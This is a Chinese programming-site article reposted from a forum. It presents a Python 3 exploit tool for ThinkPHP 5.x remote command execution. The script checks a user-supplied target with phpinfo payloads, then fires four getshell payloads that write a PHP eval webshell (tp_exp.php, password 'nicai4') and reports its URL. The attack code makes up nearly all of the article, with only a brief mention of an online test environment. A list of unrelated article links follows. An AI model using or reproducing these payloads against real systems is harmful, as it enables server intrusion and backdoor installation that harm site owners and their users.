python3编写ThinkPHP命令执行Getshell的方法

作者:nosafer 时间:2023-10-04 14:17:15 

加了三个验证漏洞以及四个getshell方法


# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email: [email]admin@nsf.me[/email]
# @Blog:  [url]http://nsf.me/[/url]
import requests
import sys
def demo():
 print(' _______ _   _    _  _____ _  _ _____ ')
 print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')
 print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
 print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
 print('  | | | | | | | | | |  <| |  | | | | |   ')
 print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')
 print()
 print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
 print('\tRemote command execution exploit.')
 print('\tVulnerability verification and getshell.')
 print('\tTarget: http://target/public')
 print()
class ThinkPHP():
 def __init__(self,web):
   self.web = web
   self.headers = {
   "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
   "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
   "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
   "Accept-Encoding" : "gzip, deflate",
   "Content-Type" : "application/x-www-form-urlencoded",
   "Connection" : "keep-alive"
   }
def verification(self):
   i = 0
   s = 0
   verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
   while True:
     if i == len(verifications):
       break
     else:
       url = self.web + verifications[i]
       req = requests.get(url=url,headers=self.headers)
       if 'phpinfo()' in req.text:
         s = 1
         break
       else:
         s = 0
       i += 1
   if s == 1:
     print("[+] There are vulnerabilities.")
     print()
     toshell = input("[*] Getshell? (y/n):")
     if toshell == 'y':
       self.getshell()
     elif toshell == 'n':
       sys.exit()
     else:
       sys.exit()
   else:
     print("[-] There are no vulnerabilities.")
def getshell(self):
   getshells = [
   '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
   '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
   '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
   '?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']
   shell = self.web + '/tp_exp.php'
   i = 0
   s = 0
   while True:
     if i == len(getshells):
       break
     else:
       url = self.web + getshells[i]
       req = requests.get(url=url,headers=self.headers)
       req_shell = requests.get(url=shell,headers=self.headers)
       if req_shell.status_code == 200:
         s = 1
         break
       else:
         s = 0
       i += 1
   if s == 1:
     print("[+] WebShell :%s PassWord :nicai4" % shell)
   else:
     print("[-] The vulnerability does not exist or exists waf.")
def main():
 demo()
 url = input("[*] Please input your target: ")
 run = ThinkPHP(url)
 run.verification()
if __name__ == '__main__':
 main()

注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。

环境地址:https://www.vsplate.com/

效果图:

python3编写ThinkPHP命令执行Getshell的方法

来源:https://bbs.ichunqiu.com/thread-48729-1-1.html

标签:python3,ThinkPHP,Getshell
0
投稿

猜你喜欢

  • 线上问题排查之golang使用json进行对象copy

    2023-10-06 05:03:23
  • PHP abstract 抽象类定义与用法示例

    2023-06-28 03:52:44
  • CSS的另类拼图___减少HTTP请求

    2009-05-28 19:05:00
  • 用 onerror 获取错误信息 js Debug

    2008-11-03 19:08:00
  • 教你四种方法用来查看mysql版本

    2009-06-28 11:13:00
  • CSS hack浏览器兼容一览表

    2007-08-14 10:35:00
  • 阿里系的中国雅虎新首页浅谈

    2008-07-16 12:19:00
  • 使用Dreamweaver MX表格排序功能

    2010-07-13 12:08:00
  • ASP中查询数据库记录写入XML文件示例

    2007-08-23 13:12:00
  • 我所钟爱的HTML5资源

    2010-07-23 09:25:00
  • Python基于多线程实现ping扫描功能示例

    2023-08-02 17:30:09
  • Python cv.Canny()方法参数与使用方法

    2023-10-06 07:24:37
  • MySQL高级特性之集合函数

    2009-02-26 16:19:00
  • python3实现字符串操作的实例代码

    2023-08-23 06:24:31
  • [译]艺术和设计的差异 (2)

    2009-10-15 12:36:00
  • PHP自定义函数格式化json数据示例

    2023-07-17 07:17:45
  • Perl命令行应用程序详解

    2023-08-09 19:01:18
  • MySQL优化之数据表的处理

    2008-12-22 14:45:00
  • ASP中3种分页显示的性能比较

    2007-08-15 13:37:00
  • 从SQL Server2000升级到2005的过程解析

    2009-01-13 14:07:00
  • asp之家 网络编程 m.aspxhome.com